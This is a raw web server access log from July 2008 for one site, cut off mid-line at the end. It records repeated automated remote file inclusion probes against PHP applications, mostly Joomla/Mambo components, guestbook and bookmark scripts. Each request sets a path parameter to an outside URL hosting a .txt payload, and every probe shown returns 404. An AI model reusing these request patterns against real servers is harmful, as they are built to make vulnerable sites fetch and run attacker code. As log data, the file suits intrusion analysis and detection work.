88.214.192.29 - - [20/Jul/2008:18:04:25 -0700] "GET //index.php?go=http://bolikowski.com/images/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:18:04:53 -0700] "GET /logs/access_080630.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:18:04:53 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:18:04:58 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.60.155.3 - - [20/Jul/2008:18:07:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
211.60.155.3 - - [20/Jul/2008:18:07:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.hot-horny-housewives.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
210.87.251.47 - - [20/Jul/2008:18:07:32 -0700] "GET /logs/access_070924.log/index.php?p=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.87.251.47 - - [20/Jul/2008:18:07:32 -0700] "GET /index.php?p=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.87.251.43 - - [20/Jul/2008:18:07:33 -0700] "GET /logs/index.php?p=http://201.70.9.109/echo2.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.10.64.239 - - [20/Jul/2008:18:09:55 -0700] "GET /logs/access_080602.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.10.64.239 - - [20/Jul/2008:18:09:56 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.10.64.239 - - [20/Jul/2008:18:09:56 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:18:11:53 -0700] "GET /afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
168.209.97.42 - - [20/Jul/2008:18:11:53 -0700] "GET /logs/afb-3-beta-2007-08-28/_includes/settings.inc.php?approot=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.galf.org"
201.26.212.89 - - [20/Jul/2008:18:12:51 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.10.64.239 - - [20/Jul/2008:18:13:00 -0700] "GET /logs/access_080630.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:18:13:04 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
72.29.87.80 - - [20/Jul/2008:18:13:04 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.beatthevegasbook.com/amember/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
74.55.52.194 - - [20/Jul/2008:18:14:15 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://themortonfamily.com/images/oke.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.galf.org"
87.10.64.239 - - [20/Jul/2008:18:15:47 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.10.64.239 - - [20/Jul/2008:18:15:48 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.10.64.239 - - [20/Jul/2008:18:15:48 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.39.5.203 - - [20/Jul/2008:18:16:00 -0700] "GET /logs/access_080113.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://linknetcrew.com/source/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.10.64.239 - - [20/Jul/2008:18:16:03 -0700] "GET /logs/access_071224.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "ww